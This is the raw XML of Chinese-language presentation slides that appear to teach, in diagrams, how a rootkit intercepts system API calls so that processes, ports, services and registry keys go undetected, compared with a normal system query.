          <a:xfrm>
            <a:off x="5918200" y="4437063"/>
            <a:ext cx="1800225" cy="576262"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 78099"/>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发现</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="125957" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B33F526-5C5E-43E3-B36C-BB2F447F7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8" y="3789363"/>
            <a:ext cx="863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74439" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E222FEAC-DC4C-440D-871C-90900386F513}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2533650" y="4508500"/>
            <a:ext cx="1800225" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 78099"/>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发现</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="125959" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BAEB15B-E1F4-4A5D-9EBB-A983EF9DC9C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1236663" y="3140075"/>
            <a:ext cx="7777162" cy="2089150"/>
            <a:chOff x="385" y="73"/>
            <a:chExt cx="4899" cy="1316"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="125961" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F8207F6-C269-40C7-A672-6D42E82DA2EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="385" y="346"/>
              <a:ext cx="635" cy="952"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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25962" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9367D4F8-BF02-4AA1-8A3C-BA90D3697DB9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2835" y="73"/>
              <a:ext cx="453" cy="1316"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF00FF"/>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操作</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                <a:t>系统</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
                <a:t>API</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                <a:t>函数</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="125963" name="AutoShape 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A1C248-FE8E-4AF5-A393-6E49A33476BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000">
              <a:off x="4603" y="73"/>
              <a:ext cx="681" cy="1271"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartOffpageConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="969696"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rot="10800000"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恶意软件</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                <a:t>（进程、</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                <a:t>端口、</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                <a:t>服务、</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                <a:t>注册表键值</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
                <a:t>…</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                <a:t>）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="125964" name="Picture 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89A96776-D6B1-4FDA-96F6-B996E3B57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 y="482"/>
              <a:ext cx="5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sp>
        <p:nvSpPr>
          <p:cNvPr id="63497" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C21D7791-9665-4AAC-A0F3-F2CBC248B493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1452563" y="981075"/>
            <a:ext cx="5400675" cy="768350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyP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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>正常的系统查询过程</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4435"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2744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4436"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27443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74437"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2744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74439"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="274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5" grpId="0" animBg="1"/>
      <p:bldP spid="274436" grpId="0" animBg="1"/>
      <p:bldP spid="274437" grpId="0" animBg="1"/>
      <p:bldP spid="27443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931FFC29-9E2F-4E1A-80B6-D1738BCFDE9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" err="1"/>
              <a:t>RootKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0"/>
              <a:t>入侵之后的系统查询过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275459" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBF7E189-3FCD-45A3-98CA-15245FB31FC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2195513" y="2995613"/>
            <a:ext cx="2160587" cy="576262"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 93733"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0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没有发现</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275460" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265ED09E-25A0-413E-AFE9-96B09AE8B9EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4573588" y="2132013"/>
            <a:ext cx="792162" cy="1439862"/>
          </a:xfrm>
          <a:prstGeom prst="smileyFace">
            <a:avLst>
              <a:gd name="adj" fmla="val 4653"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="12700" cap="sq">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RootKit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275461" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{688AC7DF-328F-4096-ABCF-67E5C93E0ECD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2266950" y="5734050"/>
            <a:ext cx="2160588" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 93733"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0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没有发现</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275462" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D5B2132-71AA-4476-A63A-1E7F755EC94A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7307263" y="4870450"/>
            <a:ext cx="792162" cy="1439863"/>
          </a:xfrm>
          <a:prstGeom prst="smileyFace">
            <a:avLst>
              <a:gd name="adj" fmla="val 4653"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="12700" cap="sq">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>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en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RootKit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275463" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA08FAE0-3016-4735-9E3C-89267451DDF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5507038" y="5807075"/>
            <a:ext cx="1800225" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 78099"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0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没有发现</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A835733-C10E-4B1F-A2CE-AB91DBD4D907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="1700213"/>
            <a:ext cx="8207375" cy="2160587"/>
            <a:chOff x="295" y="1525"/>
            <a:chExt cx="5170" cy="1361"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="126995" name="Group 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402EE975-329D-4393-9E17-D914ED8AC844}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="295" y="1525"/>
              <a:ext cx="5170" cy="1361"/>
              <a:chOff x="295" y="1525"/>
              <a:chExt cx="5170" cy="1361"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="126997" name="Group 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73EA0948-3017-4CB5-87CD-B0D76A3B7381}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="295" y="1570"/>
                <a:ext cx="4446" cy="1316"/>
                <a:chOff x="295" y="1570"/>
                <a:chExt cx="4446" cy="1316"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="126999" name="Rectangle 11">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD289E4-C2F9-4FED-9203-7E9D0707DE18}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="295" y="1843"/>
                  <a:ext cx="635" cy="952"/>
                </a:xfrm>
                <a:prstGeom prst="rect">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27000" name="AutoShape 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45020C6D-DF20-4C6C-8DB1-F61875D01028}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="976" y="1797"/>
                  <a:ext cx="1678" cy="499"/>
                </a:xfrm>
                <a:prstGeom prst="notchedRightArrow">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val 50000"/>
                    <a:gd name="adj2" fmla="val 84068"/>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恶意软件是否存在？</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="127001" name="Rectangle 13">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E36B598D-2EC5-48AE-BCEC-50A8E1769912}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3063" y="1570"/>
                  <a:ext cx="453" cy="1316"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>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操作</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPct val="0"/>
                    </a:spcBef>
                    <a:buClrTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                    <a:t>系统</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPct val="0"/>
                    </a:spcBef>
                    <a:buClrTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
                    <a:t>API</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPct val="0"/>
                    </a:spcBef>
                    <a:buClrTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                    <a:t>函数</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="127002" name="AutoShape 14">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24E4BF58-D745-49D6-8CE6-4B8E2777E945}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3562" y="1752"/>
                  <a:ext cx="1179" cy="499"/>
                </a:xfrm>
                <a:prstGeom prst="notchedRightArrow">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val 50000"/>
                    <a:gd name="adj2" fmla="val 59068"/>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查找相关文件？</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="127003" name="AutoShape 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16EFE002-5F5B-4129-B41A-4F0F76D4C97E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3562" y="2387"/>
                  <a:ext cx="1134" cy="363"/>
                </a:xfrm>
                <a:prstGeom prst="leftArrow">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val 50000"/>
                    <a:gd name="adj2" fmla="val 78099"/>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发现</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="127004" name="Picture 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFE2359F-126E-4FA2-BAAC-868C26D90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 y="1979"/>
                  <a:ext cx="54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sp>
            <p:nvSpPr>
              <p:cNvPr id="126998" name="AutoShape 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF253821-CAFF-48DA-B654-DC5FD44AE9F2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm rot="10800000">
                <a:off x="4784" y="1525"/>
                <a:ext cx="681" cy="1271"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartOffpageConnector">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:ln w="12700" cap="sq">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd type="none" w="sm" len="sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rot="10800000"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恶意软件</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                  <a:t>（进程、</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                  <a:t>端口、</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                  <a:t>服务、</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                  <a:t>注册表键值</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
